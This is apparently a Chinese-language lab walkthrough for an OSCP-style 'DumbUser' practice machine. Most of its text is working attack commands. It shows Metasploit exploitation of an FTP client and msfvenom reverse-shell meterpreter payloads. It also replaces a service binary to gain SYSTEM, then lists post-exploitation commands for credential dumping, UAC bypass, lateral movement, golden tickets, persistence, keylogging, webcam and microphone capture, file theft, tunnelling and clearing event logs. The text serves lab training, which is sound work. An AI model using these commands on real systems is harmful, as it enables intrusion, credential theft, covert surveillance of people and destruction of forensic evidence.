OSCP-006-DumbUser 靶场配置 用vm打不开靶场,只能一个vmware开kali,靶场放OVB了,网络设置成桥接
先登录DumbUser用户DumbUser:DumbUser,更改密码后,x进入系统先查看IP地址
靶机:192.168.3.11
nmcli操作错误恢复原配置 删除当前连接,重新创建
nmcli device status sudo nmcli connection delete "Wired connection 1" sudo nmcli device connect eth0
kali中用msf配置ftp服务器 msfconsole use windows/ftp/ftpshell_cli_bof set LHOST 192.168.3.12set SRVHOST 192.168.3.12set payload windows/meterpreter/reverse_tcprun
靶机链接ftp服务器
好像是FTPShell Client不对的问题,解决不了,但主要是学习思路,自己再搭一个另外的测试,就用
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.128 LPORT=4444 -f exe -o meter.exe use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcpset 场景 LHOST 0.0.0.0set LPORT 4444run
Windows提权 把accesschk64.exe传上去,检查系统权限配置
accesschk64.exe /accepteula -uwcqv
参数
含义
/accepteula
自动接受许可协议(非交互式运行)
-u
忽略用户账户的继承权限,只显示显式权限
-w
只显示写权限 (Write access)
-c
检查服务 (Services)的权限
-q
静默模式,只显示有问题的项目
-v
详细输出
accesschk64.exe -uwqs Users c:\*.*
参数
含义
-u
忽略继承权限
-w
只显示写权限
-q
静默模式
-s
递归 检查子目录
Users
指定检查 Users 用户组 的权限
c:\*.*
检查 C 盘所有文件
递归查找 C 盘中 Users 组有写权限 的文件/目录,这个命令扫描整个 C 盘,非常慢 ,通常会输出大量结果,可以缩小范围,只扫描重要目录
accesschk64.exe -uwqs Users "C:\Program Files\*" accesschk64.exe -uwqs Users "C:\Program Files (x86)\*"
找到有用的服务
根据目录去查看文件的ACL
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
查找对应的服务,然后生成替换exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=(IP) LPORT=4445 -f exe -o SecurityService.exe
传到对应目录进行替换
upload SecurityService.exe "C:\Users\DumbUser"
shell move "C:\Program Files (x86)\PCProtect\SecurityService.exe" "C:\Program Files (x86)\PCProtect\SecurityService.exe.bak" move "C:\Users\DumbUser\SecurityService.exe" "C:\Program Files (x86)\PCProtect\SecurityService.exe" exit
重启触发服务,再在kali开个监听
execute -f cmd.exe -a "/c shutdown /r /t 0 /f"
获取到权限后
run post/windows/manage/migrate
后渗透阶段 信息收集 meterpreter > sysinfo meterpreter > getuid meterpreter > getpid meterpreter > run post/windows/gather/enum_applications meterpreter > run post/windows/gather/enum_shares meterpreter > run post/windows/gather/enum_snmp meterpreter > run post/windows/gather/checkvm meterpreter > run post/windows/gather/forensics/enum_drives meterpreter > ipconfig meterpreter > route meterpreter > arp meterpreter > run post/windows/gather/credentials/credential_collector meterpreter > run post/windows/gather/hashdump meterpreter > run post/windows/gather/smart_hashdump
权限提升 meterpreter > getsystem meterpreter > run post/windows/escalate/bypassuac meterpreter > run post/windows/escalate/bypassuac_injection meterpreter > run post/windows/escalate/bypassuac_eventvwr meterpreter > run post/windows/escalate/service_permissions meterpreter > run post/windows/escalate/ms16_032 meterpreter > run post/windows/escalate/ms14_058
横向移动 meterpreter > run post/windows/manage/payload_inject msf6 > use exploit/windows/smb/psexec msf6 > set SMBUser Administrator msf6 > set SMBPass <hash > msf6 > set RHOSTS 192.168.1.20 msf6 > run msf6 > use exploit/windows/local/wmi msf6 > set SESSION 1 msf6 > set RHOSTS 192.168.1.20 msf6 > run meterpreter > load kiwi meterpreter > creds_all meterpreter > golden_ticket_create
持久化 meterpreter > run post/windows/manage/persistence_exe meterpreter > run post/windows/manage/registry_startup meterpreter > run post/windows/manage/install_service meterpreter > run post/windows/manage/wmi_persistence meterpreter > run post/windows/manage/scheduleme meterpreter > run post/windows/manage/enable_rdp meterpreter > run post/windows/manage/add_user
数据窃取 meterpreter > ls meterpreter > cd meterpreter > upload /root/file.txt C:\\Windows\\Temp\\file.txt meterpreter > download C:\\Users\\Administrator\\Desktop\\secret.doc /root/ meterpreter > run post/windows/gather/enum_files meterpreter > search -f *.docx -d C:\\Users meterpreter > search -f *password* -d C:\\ meterpreter > keyscan_start meterpreter > keyscan_dump meterpreter > keyscan_stop meterpreter > screenshot meterpreter > webcam_list meterpreter > webcam_snap meterpreter > record_mic
隧道 meterpreter > portfwd add -l 3389 -p 3389 -r 192.168.1.20 meterpreter > portfwd list meterpreter > run post/multi/manage/autoroute meterpreter > background msf6 > use auxiliary/server/socks_proxy msf6 > set SRVPORT 1080 msf6 > run proxychains nmap -sT 10.0.0.0/24
清理痕迹 meterpreter > run post/windows/manage/clear_eventlog meterpreter > run post/windows/manage/migrate meterpreter > run post/windows/manage/killav meterpreter > timestomp C:\\Windows\\Temp\\evil.exe -z